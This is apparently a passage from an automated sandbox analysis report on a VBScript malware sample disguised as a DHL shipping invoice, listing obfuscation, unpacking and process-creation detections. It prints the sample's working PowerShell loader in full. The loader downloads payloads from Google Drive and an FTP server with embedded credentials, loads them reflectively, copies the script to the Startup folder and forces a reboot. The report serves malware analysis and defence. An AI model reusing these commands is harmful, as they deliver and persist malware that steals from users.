                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

                    Data Obfuscation

                    barindex
                    VBScript performs obfuscated calls to suspicious functions
                    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' +", "0", "false");
                    .NET source code contains potential unpacker
                    Source: 3.2.powershell.exe.2203d996da0.2.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 3.2.powershell.exe.2203c0c0000.0.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 3.2.powershell.exe.2203c568c58.1.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 13.2.powershell.exe.1ab8944f358.1.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: 13.2.powershell.exe.1ab88b90000.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: 19.2.powershell.exe.1e3a11dd948.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: 26.2.powershell.exe.1c21294da58.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: 35.2.powershell.exe.1a88030d738.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: 40.2.powershell.exe.1b32ce4ed60.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Found suspicious powershell code related to unpacking or dynamic code loading
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String( $hsdzv ) ); $qqbfx = $qqbfx[-1..-$qqbfx.Length] -join '';$qqbfx = $qqbfx.replace('%XRqhI%','C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs');powershell $qqb
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [ch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [chJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,23_2_0041CBE1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B880942 push E95B7DD0h; ret 1_2_00007FFD9B8809C9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B95235D push 8B485F94h; retf 3_2_00007FFD9B952365
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9523A3 push 8B485F94h; iretd 3_2_00007FFD9B9523AB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B79D2A5 pushad ; iretd 4_2_00007FFD9B79D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B85AB push ebx; ret 4_2_00007FFD9B8B85AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B859D push ebx; ret 4_2_00007FFD9B8B85AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B84FA push ebx; ret 4_2_00007FFD9B8B851A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B851B push ebx; ret 4_2_00007FFD9B8B851A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B77D2A5 pushad ; iretd 5_2_00007FFD9B77D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8985AB push ebx; ret 5_2_00007FFD9B8985AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B89859D push ebx; ret 5_2_00007FFD9B8985AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8984FA push ebx; ret 5_2_00007FFD9B89851A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B89851B push ebx; ret 5_2_00007FFD9B89851A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B8915C5 pushad ; ret 8_2_00007FFD9B89160D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B8A613C push ebp; ret 13_2_00007FFD9B8A61D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_10002806 push ecx; ret 21_2_10002819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_10009FD8 push esi; ret 21_2_10009FD9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00457186 push ecx; ret 23_2_00457199
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041C7F3 push eax; retf 23_2_0041C7FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00457AA8 push eax; ret 23_2_00457AC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00434EB6 push ecx; ret 23_2_00434EC9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044693D push ecx; ret 29_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044DB70 push eax; ret 29_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0044DB70 push eax; ret 29_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00451D54 push eax; ret 29_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0044B090 push eax; ret 30_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_0044B090 push eax; ret 30_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_00444E71 push ecx; ret 30_2_00444E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00414060 push eax; ret 31_2_00414074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00414060 push eax; ret 31_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00414039 push ecx; ret 31_2_00414049
                    Source: 13.2.powershell.exe.1ab8944f358.1.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 13.2.powershell.exe.1ab8944f358.1.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 13.2.powershell.exe.1ab8944f358.1.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 13.2.powershell.exe.1ab8944f358.1.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                    Source: 13.2.powershell.exe.1ab88b90000.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 13.2.powershell.exe.1ab88b90000.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 13.2.powershell.exe.1ab88b90000.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 13.2.powershell.exe.1ab88b90000.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                    Source: 19.2.powershell.exe.1e3a11dd948.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 19.2.powershell.exe.1e3a11dd948.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
